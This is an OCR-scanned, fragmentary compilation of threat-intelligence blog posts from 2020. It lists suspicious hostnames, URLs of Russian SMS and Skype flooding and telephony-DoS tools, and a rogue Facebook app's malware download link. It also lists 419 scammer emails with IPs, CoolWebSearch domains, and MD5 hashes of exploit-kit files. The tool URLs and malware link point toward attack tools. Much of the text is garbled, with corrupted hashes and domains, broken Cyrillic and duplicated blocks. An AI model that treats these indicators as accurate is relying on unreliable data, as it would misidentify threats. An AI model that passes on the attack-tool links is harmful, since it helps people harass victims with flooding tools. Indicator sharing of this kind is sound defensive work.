aol-dial-200-57-102-71.zone-0.ip.static-ftth.axtel.net.mx 
act2028316150.broadband.actcorp.in 
a184-86-225-91.deploy.static.akamaitechnologies.com 
82-138-100-175.static.youbroadband.in 
78-44-231-201.fibertel.com.ar 
64-144-28-181.fibertel.com.ar 
62.4e.17c6.ip4.static.sl-reverse.com 
505139.vps-10.com 
46-214-107-142.next-gen.ro 
40-24-mail.arylump.net 
39.ip-147-135-210.eu 
368940.customer.zol.co.zw 
217-166-246-190.fibertel.com.ar 
212-129-13-110.rev.poneytelecom.eu 
210.advance.com.ar 
205-248-28-181.fibertel.com.ar 
201-251-229-37.mrse.com.ar 
201-212-24-6.cab.prima.net.ar 
200.80.198.34.static.techtelnet.net 
200-72-231-181.cab.prima.com.ar 
200-28-131-215.baf.movistar.cl 
200-159-128-19.winfnet.com.br 
20.201-238-152.etapanet.net 
198-1-66-98.unifiedlayer.com 
195-154-243-237.rev.poneytelecom.eu 
195-154-176-172.rev.poneytelecom.eu 
192.218.214.222.broad.ab.sc.dynamic.163data.com.cn 
192-163-253-154.unifiedlayer.com 
192-163-245-236.unifiedlayer.com 
190-97-10-198.bvconline.com.ar 
190-72-136-214.dyn.dsl.cantv.net 
190-36-88-98.dyn.dsl.cantv.net 
190-1-37-125.bvconline.com.ar 
19-118-171-181.fibertel.com.ar 
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189-209-217-49.static.axtel.net 
187-178-9-19.dynamic.axtel.net 
187-163-222-244.static.axtel.net 
187-163-180-243.static.axtel.net 
183-56-138-186.fibertel.com.ar 
179-40-105-76.mrse.com.ar 
164.214.219.138.dynamic.grupoequis.com.ar 
162-144-80-214.unifiedlayer.com 
162-144-79-192.unifiedlayer.com 
162-144-119-216.unifiedlayer.com 
141-131-193-190.cab.prima.net.ar 
136.218.214.222.broad.ab.sc.dynamic.163data.com.cn 
131-42-19-190.fibertel.com.ar 
116-112-189-190.cab.prima.net.ar 
105-224-171-102.south.dsl.telkomsa.net 
101.152.220.201.itc.com.ar 
100-204-189-190.cab.prima.net.ar 

Stay tuned! 
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16.10.12 Al-powered Cyber Robots That Fight Disrupt and Undermine Cybercrime - 
Check out the Framework! (2020-12-02 15:28) 


16.10.13 Dancho Danchev’s Blog - Sharing the Crown Jewels of my OSINT and Threat 
Intelligence Research - Request Private Access Today! (2020-12-05 16:27) 


Dear blog readers, 
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This is Dancho and | wanted to touch base with everyone and let everyone know that I’ve been 
thinking of switching my personal blog to private invite-only mode where users who request 
access can basically subscribe themselves to an upcoming flood of high-quality and never- 
published before OSINT and threat intelligence which basically represents a huge portion of 
the crown jewels of my research which | intend to share with a specific and highly-targeted 
audience which might be interested in subscribing to my personal blog in a private invite- 
only mode which would greatly motivate me to continue doing my research and actually earn 
the necessary financing which could assist me in my daily work activities where the primary 
motivation behind switching my personal blog to private invite-only mode is to reach out to a 
highly qualified and technical audience who might be interested in paying a modest fee for the 
purpose of obtaining access to my personal blog. 


Here’s how it works - readers who’ve been reading my personal blog throughout the past 
decade and might be interested in obtaining private invite-only access which starts from Jan- 
uary, 2021 can approach me with the following information: 


Name: 
Position: 
How long have you been reading my blog? 


What’s your primary motivation for obtaining private and invite-only access to my personal 
blog? 


How much would you and your organization be willing to pay to obtain access to my blog on 
a monthly or yearly basis? 


I’ve decided to present a basic pay-as-you-go business model which aims to gather high-quality 
vetted audience where | intend to present 


16.10.14 Analysis of Russia’s Emergind TDoS (Telephony Denial of Service) Attack 
Market (2020-12-05 21:30) 


Onya Tenemoua 
Cmc mnyg 
Onyf, 3BOHKOB 
TEJIEDOHHbIN ABTOLO3BOHLUMK VOIP 
Onyv cepsuc 
OnyA Ha TeneqouH 
Onya TenedouHos 3BOHKaMU 
Nporpamma 
Onyf CTaLMOHAPHbIX U MOOUW/IbHbIX TeNeqOHOB 
SIP Onygep 
BMobile Attacker 
SMS Skyper 
Rings Skyper 
http://mobile777.nethouse.ru/ 
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http://pro-ddos.com/index-2.htm| 
http://spam-telefona.ru/skype-spamer/ 

http://teleporting.ru/ 

http://sip-system.com/flood/ 

http://stoptelefon.com/ 
http://softsnew.ru/soft/671-sms-fluder-mailru.html 
http://softsnew.ru/soft/452-musendersms.html 
http://softsnew.ru/soft/425-floder-mobile.html 
http://softsnew.ru/soft/393-sms-sender.html 
http://softsnew.ru/soft/382-sms-flooder-by-klychev.html 
http://softsnew.ru/soft/262-teleflooder.html 
http://softsnew.ru/soft/250-sms-flooder.html 
http://nappy-hack.ru/flud/10294-skype-tvist-spam-flooder.html 
http://nappy-hack.ru/flud/10297-smsbomber-versiya-151.html 
http://happy-hack.ru/flud/10133-smsbomber-v10.html 
http://happy-hack.ru/flud/10070-sms-flooder-by-zoomer.html 
http://happy-hack.ru/spam/10035-skype-f.html 
http://happy-hack.ru/flud/9675-sms-flooder.html 
http://nhappy-hack.ru/flud/8440-sms-flooder-by-klychev.html 
http://nappy-hack.ru/flud/1149-sms-flooder-by-klychev.html 
http://happy-hack.ru/flud/640-teleflooder.html 
http://nappy-hack.ru/flud/577-death-mobile-v02.html 
http://happy-hack.ru/flud/530-smse-post-flooder-by-victor20010.htm! 
http://happy-hack.ru/flud/329-sms-flooder-alawar.html 
http://happy-hack.ru/flud/216-rings-skyper.html 
http://nappy-hack.ru/flud/192-yafluzhu.html 
http://nappy-hack.ru/delphi/173-smsfloodersource.html 
http://nappy-hack.ru/flud/98-lastcall-flud-telefonov. html 


16.10.15 KrotReal (2020-12-05 21:31) 


2013-02-05 - fastfindkit.com - on 2013-02-17 used to respond to 74.117.221.72 
https://www.virustotal.com/en/ip-address/74.117.221.72/information/ 
www.stonybrookcob.com 

update.searchmiracle.com 


u.searchmiracle.com 
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www.clubhyundaicoupe.com 
www.toptravel.com 
www.waketheflockup.com 
www.broadwaysuites.com 
www.changeroomhunters.com 
www.Imfaonews.com 
silverscreenart.com 
2013-03-06 - uploadfile.asia - 176.9.146.79 
https://www.virustotal.com/en/ip-address/176.9.146.79/information/ 
2013-04-10 - homexxxvids.com - 88.198.17.130 (udo-ehlen.de); (v2mljs.org) 
2013-04-18 - homexxxvids.info - 88.198.17.130 
2013-04-18 - homexxxvids.net - 88.198.17.130 
2013-05-29 - adult-redirect.biz - 178.63.15.15 
ml-js-777.org 
ml-js.org 
plasticfind.com 
track-mind.com 
site-searching.com 
lostwebtracker.com 
ml-js.com 
porn-mix.com 
ml12js.biz 
ml13js.biz 
adultvideoxxx.biz 
drn-prn.ru 
getgdz.com 
getgdz.net 
green-tracker.com 
horomob.com 
horomob.net 
horomob.org 
kolpoxes.ru 
mOb-tube.com 
mob-dating.com 
mob-dating.net 
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mob-dating.org 
mob-ka.com 
mob-ka.net 
mob-paty.com 
mob-tube.com 
mob-vids.com 
mobcelebrity.com 
mobcelebrity.net 
mobcelebrity.org 
mobile-vista.org 
mobileporno.info 
mobpaty.com 
mtgoquote.com 
perfectgirlsmobile.org 
pfiles.name 
porevich.net 
porn-mix.com 
red-tracker.com 
stars-adult.biz 
tube4mob.com 
wap-portal.org 


znamenitosti-adult.biz 


16.10.16 Rogue Facebook applications distribute adware (2020-12-06 03:47) 


BitDefender is reporting on 


What’s so special about this bogus Facebook application? It’s a rebranded version of a similar 
adware-serving Facebook app from last week. 


Numerious Facebook users are already posting 

"Redhot sexy girl in thong dancing [HQ]" 

NEW ONE: 

"Sexy masseur gone out of control! [HQ]." 

Name of application: 

"MXF Movi | Facebook’ 
http://www.facebook.com/apps/application.php?id=106744506034490 
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http://apps.facebook.com/mxfmovi/ 

http://downloads.allokfree.com/FLVDirect.exe 

- The rogue application requires you to allow it to access your profile 

- Since the self-repblicain is abusing trust, you may want to reconsider allowing access to sent 
by your friends 

- It offers your video content that is only viewable with their malware-sih app - ow convinient 
indeed 


’ 


16.10.17 Exposing a Pay-Per-Install and Rogue Spyware Command and Control 
Database Interface (2020-12-06 04:10) 


16.10.18 Sampling 419 Advance Fee Scams Activity - Part Three (2020-12-10 18:23) 


notice 
2579 MALS 
2 SPAM EMAILS (1 


|e 419 MAILS 


|e SPAM E-nAILS 
| @ E-MAIL EXTRACTORS 
are NOT ALLOWED 


poets eave Mer 
v } 


| 
| 
| arp one tmagne 
| Aetnarequsane Asanenires BRASS 


Continuing the "[1]Sampling 419 Advance Fee Scams Activity" series of blog [2]posts I’ve de- 
cided to offer yet another peek inside their malicious and fraudulent activity and publish part 
three of the series. 


david ikemba@supereme-loan-finance.com - 96.24.14.4 
charles.maynard1@gmx.com - 218.31.134.111 
mr.karimahmed2004@msn.com - 41.203.231.82 
fedexdelivryservices@yahoo.com.hk - 89.187.142.72 


sgtjeremyk@live.com - zimbra3-vm1.lb2.telkomsa.net 
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chevrondisbursement@hotmail.com - 41.138.182.245 
mrslindahilldeskOOO0OO@hotmail.co.uk - 41.138.188.45 
natt.westt@live.com - 115.242.40.142 
googlellanniversary2010@live.com - 115.240.21.112 
barjamessmith@qatar.io - 115.242.94.153 

delata ecobank@web2mail.com - 202.58.64.18 
junhuan9@yahoo.cn - 68.190.243.51 
fairlandindustryltd@mail.ru - 441.138.190.213 
shkhougal@aol.com - 80.35.222.9 
jamestimeswel@rogers.com - 203.170.192.4 
alimubarakhm@hotmail.com - 115.134.5.245 
godwinemefiele2010@hotmail.com - 41.211.229.65 
skyebankplclagosnigera@gmail.com 
skyebankplclagosnigera@zapak.com - 41.138.178.241 
contact.alcchmb@sify.com - 116.206.153.50 
officelottery94@yahoo.com.hk - 124.122.145.226 
kadamluk@live.com - 41.217.65.14 
garycarsonuk@w.cn - 220.225.213.221 

stella _willson48@yahoo.co.uk - 82.196.5.120 
trustlink@w.cn - 87.118.82.8 
george201009@hotmail.com - 59.120.137.197 
drmannsurmuhtarrr _155@yahoo.cn 
mrstreasurecollinnsss@gmail.com - 82.114.78.222 


Stay tuned! 


1. sampling-419-advance-fee-scams-activity.htm 
2. sampling-419-advance-fee-scams-activity.htm 
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16.10.19 From the "Definitely Malicious" Department - Exposing a CoolWebSearch 
Domains Portfolio (2020-12-10 18:24) 


=" CWShredder - CoolWebSearch Trojan Remover v2.19 


“TREND MICRO’CWShredder’=" 


Scan is complete! 
CoolWebSearch was not found on this system. 


Test Your System for Other Spyware 
Protection for Small and Medium Business 
Anti-Spyware Solutions for the Enterprise 


Remember CoolWebSearch? Check this out. This is definitely "from the malicious software 


department". 


Sample CoolWebSearch domains portfolio known to have participated in various campaigns 


throughout the years: 
0-29.com 

0-2u.com 

0O-days.net 
000info.com 
001soft.cn 

0O01ly.com 

00ly1l.com 
007arcadegames.com 
007ground.com 
008.net 

008i.com 

008k.com 

O0O0hq.com 

OOinfo.com 
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OOnff. info 

OOting.com 
00z270az77mnsa-O00swj1zzprh.com 
010402.com 
0190-dialer.com 
01q-09.info 
02d0/7ftfie2.info 
O2pmnzy5eo29bfk4.com 
032439.com 

04080.com 

05p.com 

070808.net 
07ic5do2myz3vzpk.com 
O86orfqz.info 
O8nigbmwk43i0ly6.com 
093qpeuqpmz6ebfa.com 
0aazzz0x0z0x0z0z0.com 
Obucksforpornmovie.com 
Ocalories.net 

Ocat.com 

Ocj.net 

Odgpm63e.info 
Ofazrvp0x7x.info 
Ofish.cn 
Ofkhzhpoxstn717y.com 
Og3nf.info 
Oi4ixakh2d6hun43.com 
OohOfzbshy.info 
Oracle.info 
Ot9nry5b5cjw.info 
Otexkax7c6hzuidk.com 
Oun8yo7rh82m416k.com 
Ovibd7viihxrtpyu.com 
Owdg2ytaz94y.info 
Owebsearch.com 
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Owpel8bs0On.info 
Ox1fe.org 
0x447coic5r.info 
Oym6eilsaev6eiuw.com 
Oyyux7ujmkso.info 
Ozoafrqnit8em7xa.com 
1-2-1lcam.com 
1-2-lwebcam.com 
1-britney-spears-nude.com 
1-domains-registrations.com 
1-extreme. biz 

1-se.com 
100000games.net 
10000xing.cn 
1000funnyvideos.com 
1000ip.net 
1000s-great-dates.com 
1001-search.com 
1001movie.com 
1001night. biz 
1001porngalleries.com 
100freegalls.com 
100gal.net 
100hyips.com 
100mature.net 
100pantyhose.com 
100sexlinks.com 
101lottery.com 
10k1txdk35mt02xx.com 
10money.us 
10offers.com 
111010001101window.info 
11523822.cn 
116ron.org 
123-find4u.com 
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123-music-video.info 
123-search.net 
123-search4u.com 
123-searchengine.com 
12345678901234567891.com 
123keno.com 
123mania.com 
1230nlinesearch.info 
123search.com 
123search4u.com 
123spywar.com 
123ticket.com 
123topsearch.com 
123xxl.com 
123zae.biz 

126.cn 

12adxs.info 
12rix.info 
12rxtx.info 
12whrvxe.info 
1337creations.com 
135mp3.com 
136136.net 
137wg.com 
1390578.cn 
13adxs.info 
13bbs.info 
13iuey.info 
13tw22rigobert.de 
143fuck.com 
15p0p6k140.info 
1600rate.com 
163.com 
168b5i43qa.info 
16a.us 
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171203.com 
171817.com 
172127112.com 
17cunts.com 

17dk.com 
17re8px9vlypc6w7.com 
17tahun.com 
17webplace.com 
1800-search.com 
1800searchonline.com 
1800taxfree.com 
180searchassistant.com 
180solutions.com 
1844112.cn 
18age-domination.com 
18design.com 
18honeys.com 
18party.com 
18post.com 
18teenpic.biz 
18uz3wkpu86hbu3v.com 
1987324.com 
19qve.info 

1a123.com 
la7r4k8ccwtfyngh.com 
laccess4free.com 
lag24u.info 
lawm.com 

1Icheck.us 
Iclickspyclean.com 
1clicksuite.net 
lcost.us 

1ldumb.com 
le3fnc-m3z.info 


leeluzhg.info 
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lerysguv33.info 
1lfgkalhyvn4wktui.com 
lgangmu.com 

lgb.ru 
livk5kdbnq984yhk.com 
1kOk2kqgipuh9utdg.com 
1k68cc1.info 
Lky4owcrh7ziwukm.com 
Lloss.us 
Imv8hnwmyskkpgm9.com 
1Info4u.info 

Lpill.us 
lq5sarab3mpri3hs.com 
1qiq0okzb7hcb3xr.com 
1r-17pellu2.info 
LrotOu3rw3ho5wdi.com 
1rx1.com 

lse.ru 

1lsexparty.com 
1lsp50pr2y.info 
1lspmt1lxfmumzz2isf.com 
1lspybot.com 
1lspyware-removal.com 
1lspywarekiller.com 
1stantivirus.com 
1Istblaze.com 
1stfind.com 

1stflirt.org 
1Isthardsex.com 
1lstpagehere.com 
1lstsearchportal.com 
lstspywar.com 
1toz555.info 

ltraff.us 
lv98ngy4g45r.info 
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1lvi5x3s4d9x7pn36.com 
lvvzq5t3kwfiwzmt.com 
lweight.us 
1lwo4a. info 
1Lxvodqv3mtxp9dyy.com 
1XxXx.uUS 
lyegswkkcroeertt.com 
lymn4rlb62.info 
1ze.net 
2-1337-4u.de 
2-antispyware.com 
2-extreme. biz 
2-gnttlaye.info 
2-spyware.com 
2000guys.com 
2001positions.com 
2004search.cc 
2005-search.com 
2005onlinecasinos.com 
2007ip.com 
2007postcards.com 
2020search.com 
20health.com 
20mbweb.com 
20pills.com 
20shots.com 
20spyware.deus 
20x2p.com 
212-229-05.com 
21380.com 
21landover.com 
21century-mp3.nu 
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Dear blog readers, 


It’s been a while since I’ve last posted a quality update and I’ve decided to share with everyone 
the results of a recent initiative where | aim to provide actionable threat intelligence on some of 
the key client-side exploits serving kits in terms of actual MD5s for the purpose of empowering 
AVs and IDS snort vendors with the necessary threat intelligence to actually track down and 
"connect the dots" on multiple client-side exploits serving campaigns located on their servers 
or actually targeting their clients and customers internationally. 


In this post I’ll provide actionable threat intelligence on some of the market leading client-side 
exploits serving kits including actual MD5s with the idea to empower vendors and organizations 
with the necessary technical data to help them stay on the top of their game. 


Sample MD5s for some of the market leading client-side exploits serving kits currently in 
circulation: 


down.php 
fc777c291ce6c698a5f6e45fe9bd3f9Ic 
inc.config.php 
8aa342e72f8ae70a531cc70dcdala3e8 
index.php 
a57201e670eed84b569f7316e792fd98 
localhost.sql 
6e2c7c52fd2cc96eacc381flc4aeaf96 
change _pass.php 
€41944e9c9c4976a27f567132b0ab227 
clear _db.php 
2d99bcc8c773ab4ee629779e72db28d8 
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help.php 70e463e1e28c020797f33c64411e0d9f 
index.php 
1262444904ea83ca4738ce226898c752 

ip _stat.php 
b62e37644027891c87bb70b142fdf629 
lang.php ddf37a4721cla3fefdec422ab3e2e5db 
login.php 
3a6e109f16a32a31b1f2583016291543 
logout.php 
e2cb2c3cf3fa31921be761765840bbbe 

user _manager.php 
0580b5e0565f22691d4e3a6e7bc83286 


ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae. gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af. gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag. gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
am.gif 
6a2e3d4ac7139f1665ec85daf905c4fb 
an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
3a30af9a98cf20e6619eeE234e8c7f929 
aq. gif 
23507525ab4e7d1023a3a6940790d9c6 
ar.gif 
2940a84a15b26e5ee37fa29a89947228 
as. gif 
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e56e28dec792c71b32cb7299ebd83751 
at.gif 
cadc74036384cda59ee91d99bdcfdd69 
au.gif 
b91b6739c8107e29680568ef8ff952f9 
aw.gif 
8e91812abcd372b3a32e7c16c15dd8ed 
az.gif 
64c82a7cafccd37a526f7745b915b8aa 
ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 
bb.gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
5349673c83420f65faac21f9ee14a7d2 
be.gif 
e2697c0d2f33f4c8ca85dac762734cfc 
bf.gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg.gif 
f6e51fba28e2744b678ffd752d75f945 
bh.gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 
bi.gif 
fe5f4500cf4baef1d65a424e8d5689bc 
bj.gif 
97af4afce5fd166559201493f6848c47 
bm.gif 
06045f155dd3b1d22cd28b86e57de479 
bn.gif 
43948655b170b8e063f023620d97c76b 
bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c51lbaed8e6a7 
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bs. gif 
1bc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 

995226c86da889b7 7ee9fa9c60bee399 
bv. gif 
e023614ca4df2ed1be0dacf9f736826a 
bw. gif 
d4232256a8374cff569021c5351301be 
by.gif 
23f79b7553f5cdcc90f3bcelf7feld0c 
bz.gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd12ecd11f 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
62a3129d39d66d648580fbeeflfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 
0f8d3618f8a62d914f0f792a83c2c687 
ck.gif 
edafceaaf10f5f387523fd27915628e7 
cl.gif 

65341 ffddf87323b55fdff8bb115bc75 
cm.gif 
1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
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c5fa3319590501d12afd4e16b4ed81b0 


cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz.gif 
3c706c7f9d3bb30ae2df290c8a9be3e7 
de.gif 
1f31389417402bf187e3276579adcfcl 
dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk. gif 
8337faebf55a6e5b297aff95517147a9 
dm.gif 
6f33e31ac969168d9431cc865001la21a 
do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec.gif 
6d213134a8af6250fe5b269d16b52967 
ee.gif 
3e3f7d30e9e58b2c98f6f5d7f7be164c 
eg.gif 
9600de10fc4779b7873d463e4a5188e9 
er.gif 
238dde43e7077fade86597999e6046c2 
es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et. gif 
737dc12da78a0b27b999544a41b8c954 
eu.gif 


6a257a89ee638d66865664ee968ff72c 
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fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 


fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo. gif 
adc678b55e16ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb. gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge. gif 
ac87f86413d9e214be3de0d3820cfla7 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal1278e3c0e2ede6 
gl.gif 
220ba9d5444b958512cf8c14e6f3664d 
gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
c07acd5a538c11ec4933de155b5341a2 
gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
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cee23846c8603623882ed5134406806c 
gt.gif 
9b5e92154496a88f1cal0648454977af 
gu.gif 
d8ee6ee605a30ddadafb179000fle62b 
gw.gif 
7008cdb584b4983fbf7458de392f3b82 
gy.gif 
e0745abf42d852da0588adeab822c002 
hk.gif 
83301f5dfebf29cd5aca49a6272240c8 
hm.gif 
3a24264185daf6e8c307d523a544e5ac 
hn.gif 
99b20f53c38c2f36de5677946e7cb042 
hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht.gif 
99b88b35b9310162500f187da64b579e 
hu.gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il. gif 
ce092caal539ae185ae407fbc543cd5c 
im.gif 
31a602ae1723a9e5bfffc3304c15287e 
in.gif 
3f042c528c4bf957777be35f6b18c691 
index.html 
262€8959f3677c1f8ecb58d0ea638ce9 
io.gif 
35b9c8f05cObce96ae295cd97997bb43 
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iq.gif 
43a114c7298e15308378fe959f94f3ed 


ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it.gif 
72b0c360b078e4b7d58840c12ec89525 
je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke. gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
20261977ecf77a413b7565ada8el26fa 
kh.gif 
10324ab7e6a04171269da2092333d4e6 
ki. gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69c85b128a0 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 
27b12726647e7e783763ad85fbf407c5 
kw.gif 
f58f3613420bee6129e2967e18989839 
ky.gif 
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cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b77a4b4f 
la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 
6b7a372934ffc86493ae4daadaa67/501 
Ic.gif 
4ff65704775e685024c149a9b86787e0 
li. gif 
7cffdd4b033b2e5534789c0471a291lee 
Ik.gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 
€2623c89857fd31be09af4f4f713b73c 
Is.gif 
bcbb085a5dff8f8e84cb04a140281745 
It. gif 
d4487bf9895cfbal4176c57f966050a3 
lu.gif 
c333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F97F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
mh.gif 
65cb04da9b025288c09d06208b748581 
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mk.gif 
8046e9ba9370efa3c5f7312000d0a608 
ml.gif 
82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo.gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
f7536c02354a2aa29ad117a0e317046b 
mq.gif 
31a6497822781lafecafcO8efdb911459 
mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms. gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt.gif 
b630e0faea7c9db87aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv. gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw.gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my. gif 
809e20fabeadfa4fédfaf629bfe32786 
mz.gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 
7879034a66005c6362f2dd6e76006903 
nc. gif 
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1891dd4e9799a25058fe59c2ae6bcab6c 
ne.gif 
9f8f0b3e38b4b388cd1a876991632f25 
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sh.js 
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windows. inc 
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35b9c8f05cObce96ae295cd97997bb43 
ig.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it. gif 
72b0c360b078e4b7d58840c12ec89525 
je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke.gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
202b1977ecf77a413b7565ada8el26fa 
kh.gif 
10324ab7e6a04171269da2092333d4e6 
ki.gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69c85b128a0 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 
27b12726647e7e783763ad85fbf407c5 
kw. gif 


9407 


f58f3613420bee6129e2967e18989839 
ky.gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b7 7a4b4f 
la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 
6b7a372934ffc86493ae4daadaa6/501 
Ic.gif 
4ff65704775e685024c149a9b86787e0 
li.gif 
7cffdd4b033b2e5534789c0471a291ee 
Ik. gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 

€2623c8985 7fd31be09af4f4f713b73c 
Is.gif 
bcbb085a5dff8f8e84cb04a140281745 
It. gif 
d4487bf9895cfba14176c57f966050a3 
lu.gif 
c333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F97F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
9408 


mh.gif 
65cb04da9b025288c09d06208b748581 
mk.gif 
8046e9ba9370efa3c5f7312000d0a608 
ml.gif 
82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo.gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
£7536c02354a2aa29ad117a0e317046b 
mq.gif 
31a6497822781lafecafcO8efdb911459 
mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms.gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt. gif 

b630e0faea7c9db8 7aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv.gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw. gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my.gif 
809e20fabeadfa4f6dfaf629bfe32786 
mz.gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 


9409 


7879034a66005c6362f2dd6e76006903 
nc. gif 
1891dd4e9799a25058fe59c2ae6bcab6c 
ne.gif 
9f8f0b3e38b4b388cd1a876991632Ff25 
nf. gif 
76521b2845914c88e6ae0d70623d1fdd 
ng.gif 
d97fe7f8986ada525dc000848a63f904 
ni.gif 
97196c326f4192d80fb0370c2eb14bd3 
nl.gif 
96199acdb50773fe45dfdbc31078ea4c 
no.gif 
d98132d9186daf717fea60b515391dbb 
np.gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fa663ebff4aeb7abe9 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 
2cb5e6357313398ff7769acdc246d5a5 
pe.gif 
5c359dd05ae0be539b2d428c767269a3 
pf. gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
pg.gif 
f8640f7168928cb4186fcOb3ffe91975 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
pk.gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 
9410 


pl.gif 
a929046f3f0c7781989a284371a7f43b 
pm.gif 
82147e98807c03773c0b68356172814d 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
ps.gif 
ed8543ef592caa4d4a0ca3b636d52449 
pt.gif 
ae548aa692ef71a331afe943026e111d 
pw.gif 
6a3alfcO91aa71fc473277a02dccdd2c 
py. gif 
